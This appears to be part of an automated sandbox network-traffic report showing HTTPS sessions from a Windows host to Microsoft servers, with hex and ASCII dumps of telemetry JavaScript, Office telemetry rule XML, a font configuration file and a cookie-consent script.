                                                                                                                                                                                          Data Ascii: tion gc(e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,fu
                                                                                                                                                                                          2024-11-23 16:44:52 UTC16384INData Raw: 29 2c 68 28 29 2c 6d 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f
                                                                                                                                                                                          Data Ascii: ),h(),m(e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reaso
                                                                                                                                                                                          2024-11-23 16:44:52 UTC16384INData Raw: 28 7b 4e 6f 72 6d 61 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74
                                                                                                                                                                                          Data Ascii: ({Normal:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}ret
                                                                                                                                                                                          2024-11-23 16:44:52 UTC16384INData Raw: 28 6f 2c 22 41 75 74 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75
                                                                                                                                                                                          Data Ascii: (o,"Auto track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=fu
                                                                                                                                                                                          2024-11-23 16:44:52 UTC16384INData Raw: 63 6f 6e 66 69 67 2e 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73
                                                                                                                                                                                          Data Ascii: config.coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._s
                                                                                                                                                                                          2024-11-23 16:44:52 UTC16384INData Raw: 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74
                                                                                                                                                                                          Data Ascii: e)return!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t
                                                                                                                                                                                          2024-11-23 16:44:52 UTC16384INData Raw: 67 3d 22 57 65 62 41 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22
                                                                                                                                                                                          Data Ascii: g="WebAuthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split"
                                                                                                                                                                                          2024-11-23 16:44:52 UTC16384INData Raw: 61 28 65 5b 6d 76 5d 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f
                                                                                                                                                                                          Data Ascii: a(e[mv])),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          68192.168.2.54980013.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:51 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:52 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 502
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                          x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164452Z-174c587ffdfdwxdvhC1TEB1c4n000000035g000000006k5r
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:52 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          69192.168.2.54979713.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:51 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:52 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 411
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                          ETag: "0x8DC582B989AF051"
                                                                                                                                                                                          x-ms-request-id: 961908b5-401e-0016-178c-3a53e0000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164452Z-174c587ffdfp4vpjhC1TEBybqw000000036g00000000actv
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:52 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          70192.168.2.54979913.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:51 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:52 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 470
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                          ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                          x-ms-request-id: 43d09947-101e-005a-2421-3c882b000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164452Z-178bfbc474bq2pr7hC1NYCkfgg00000004xg0000000061a5
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:52 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          71192.168.2.54979813.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:51 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:52 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:52 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 427
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB556A907"
                                                                                                                                                                                          x-ms-request-id: 41485cca-c01e-0034-71f5-3c2af6000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164452Z-178bfbc474bbbqrhhC1NYCvw7400000004v000000000cu35
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:52 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          72192.168.2.5498022.18.109.164443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:52 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                          Range: bytes=0-2147483646
                                                                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                                                                          2024-11-23 16:44:52 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                          ApiVersion: Distribute 1.1
                                                                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                          X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                          Cache-Control: public, max-age=233309
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:52 GMT
                                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          X-CID: 2
                                                                                                                                                                                          2024-11-23 16:44:52 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          73192.168.2.54980113.107.246.634431708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:52 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                          Host: wcpstatic.microsoft.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                          Referer: https://learn.microsoft.com/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-11-23 16:44:52 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:52 GMT
                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                          Content-Length: 52717
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                          Age: 34758
                                                                                                                                                                                          Cache-Control: max-age=43200
                                                                                                                                                                                          Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                          Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                          Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                                                                          x-ms-request-id: 3774b461-701e-003c-4476-3de918000000
                                                                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                                                                          x-azure-ref: 20241123T164452Z-174c587ffdfp4vpjhC1TEBybqw000000032000000000sfax
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:52 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
